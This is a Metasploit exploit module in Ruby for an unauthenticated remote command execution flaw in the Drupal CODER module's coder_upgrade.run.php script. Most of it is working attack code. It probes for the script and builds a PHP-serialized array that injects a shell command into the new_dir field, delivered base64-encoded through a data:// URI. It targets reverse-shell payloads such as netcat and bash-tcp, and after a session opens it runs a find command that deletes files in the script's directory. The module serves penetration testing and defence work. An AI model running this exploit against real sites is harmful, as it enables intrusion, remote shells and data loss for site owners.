Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
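##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Drupal CODER module: unauthenticated command execution through
# coder_upgrade.run.php.
#
# The script is requested directly under sites/all/modules (no Drupal
# bootstrap, so the module does not even need to be enabled) and takes a
# `file` GET parameter that it appears to treat as the path of a
# PHP-serialized parameter file. Handing it a data:// URI lets the client
# supply that serialized array itself; the `new_dir` item of that array is
# where the shell command is injected ("-v;<cmd> #").
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Location of the vulnerable script, relative to the Drupal document root.
  SCRIPT_PATH = 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Drupal CODER Module Remote Command Execution',
        'Description' => %q{
          This module exploits a Remote Command Execution vulnerability in the
          Drupal CODER Module. Unauthenticated users can execute arbitrary
          commands under the context of the web server user.

          The CODER module doesn't sufficiently validate user inputs in a script
          file that has the PHP extension. A malicious unauthenticated user can
          make requests directly to this file to execute arbitrary commands.
          The module does not need to be enabled for this to be exploited.

          This module was tested against CODER 2.5 with Drupal 7.5 installed on
          Ubuntu Server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Nicky Bloor <[email protected]>', # discovery
          'Mehmet Ince <[email protected]>' # msf module
        ],
        'References' => [
          ['URL', 'https://www.drupal.org/node/2765575']
        ],
        'Privileged' => false,
        'Payload' => {
          # The command is embedded in a PHP-serialized string field whose
          # declared length must match exactly, so keep it short.
          'Space' => 250,
          'DisableNops' => true,
          # The injected value is presumably consumed as a directory name
          # (it sits in `new_dir`), so a '/' must not appear in the command.
          'BadChars' => "\x2f",
          'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
          },
        },
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [ ['Automatic', {}] ],
        'DisclosureDate' => '2016-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
      ]
    )

    # Files left behind by the script are removed in on_new_session.
    self.needs_cleanup = true
  end

  # Requests the script with no parameters. An exposed copy answers with its
  # "file parameter is not set" complaint; that proves the script is reachable,
  # not that the command injection works, hence Appears rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Unknown when the host does not answer,
  #   Appears when the script's error text is seen, Safe otherwise.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, SCRIPT_PATH)
    )

    # No response at all tells us nothing about the target; don't call it Safe.
    return Exploit::CheckCode::Unknown unless res

    # NOTE(review): this literal reads like two consecutive script messages
    # fused together ('file parameter is not set' / 'No path to parameter
    # file'). Confirm it against the script's real output; if the two are
    # separated by markup or a newline, check will report Safe on a
    # vulnerable host.
    if res.body.include?('file parameter is not setNo path to parameter file')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Builds the serialized parameter array and delivers it through the `file`
  # GET parameter as a data:// URI, so the script reads our bytes instead of a
  # file on disk. The command is injected into the `new_dir` item as
  # "-v;<cmd> #": the ';' terminates whatever command the script builds around
  # the value and the '#' comments out its remainder.
  def exploit
    # Fetch the encoded payload once so the declared length always matches
    # the bytes that are actually sent.
    cmd = payload.encoded
    injected = "-v;#{cmd} #"

    serialized = ''
    serialized << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
    serialized << 's:11:"theme_cache";s:16:"theme_cache_test";'
    serialized << 's:9:"variables";s:14:"variables_test";'
    serialized << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
    serialized << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
    serialized << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
    # PHP's s:N: prefix is a byte count, not a character count.
    serialized << %(s:7:"new_dir";s:#{injected.bytesize}:"#{injected}";)
    serialized << 's:4:"name";s:4:"test";}}}'

    data_uri = "data://text/plain;base64,#{Rex::Text.encode_base64(serialized)}"

    print_status('Sending serialized parameters through the data:// wrapper')
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, SCRIPT_PATH),
      # Parameters are sent unencoded so the data:// URI reaches the script as
      # written. NOTE(review): a '+' in the base64 then arrives raw and PHP
      # decodes it as a space in $_GET; confirm the data:// decoder tolerates
      # that, or percent-encode the value, before changing this.
      'encode_params' => false,
      'vars_get' => {
        'file' => data_uri
      }
    )
  end

  # Post-session cleanup. FileDropper can't cope with the odd file names the
  # script leaves behind, so everything in the script's own directory except
  # the script itself is deleted. The `[ -f coder_upgrade.run.php ]` guard
  # restricts the destructive find to that directory, i.e. it only fires when
  # the session's working directory is where the script ran. Anything else
  # legitimately stored there (subdirectories included) is removed as well.
  #
  # @param session [Msf::Session] the freshly opened command shell session
  def on_new_session(session)
    # This find command should be decently portable...
    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
    print_status("Cleaning up: #{command}")
    session.shell_command_token(command)
  end
end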